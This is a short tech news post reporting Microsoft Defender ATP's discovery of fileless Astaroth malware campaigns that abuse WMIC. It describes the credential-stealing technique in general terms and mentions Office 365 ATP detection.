Microsoft announced today the discovery of many ongoing malware campaigns by the Windows Defender ATP team.
These campaigns distribute the Astaroth malware in a fileless manner, which makes it even more dangerous.
Speaking of malware campaigns, you can nip them in the bud with these antimalware tools.
Here’s how a Microsoft Defender ATP researcher described the attacks:
I was doing a standard review of telemetry when I noticed an anomaly from a detection algorithm designed to catch a specific fileless technique. Telemetry showed a sharp increase in the use of the Windows Management Instrumentation Command-line (WMIC) tool to run a script (a technique that MITRE refers to XSL Script Processing), indicating a fileless attack
What is Astaroth and how it works?
If you didn’t know, Astaroth is a well-known malware focused on stealing sensitive information like credentials and other personal data and sending it back to the attacker.
A very interesting thing is that no files, except system tools, are involved in the attack process. This technique is called living off the land and it’s usually used to easily backdoor traditional antivirus solutions.
How can I protect my system against this attack?
If you’re a Office 365 user, you’ll be happy to know that:
For this Astaroth campaign,Office 365Advanced Threat Protection (Office 365ATP) detects the emails with malicious links that start the infection chain.
As always, for more suggestions or questions, reach for the comments section below.
- Hackers use old malware in new packaging to attack Windows 10 PCs
- Recover your Windows 10 PC after malware infection [EXTENSIVE GUIDE]
- Top 4 website malware removal software for 2019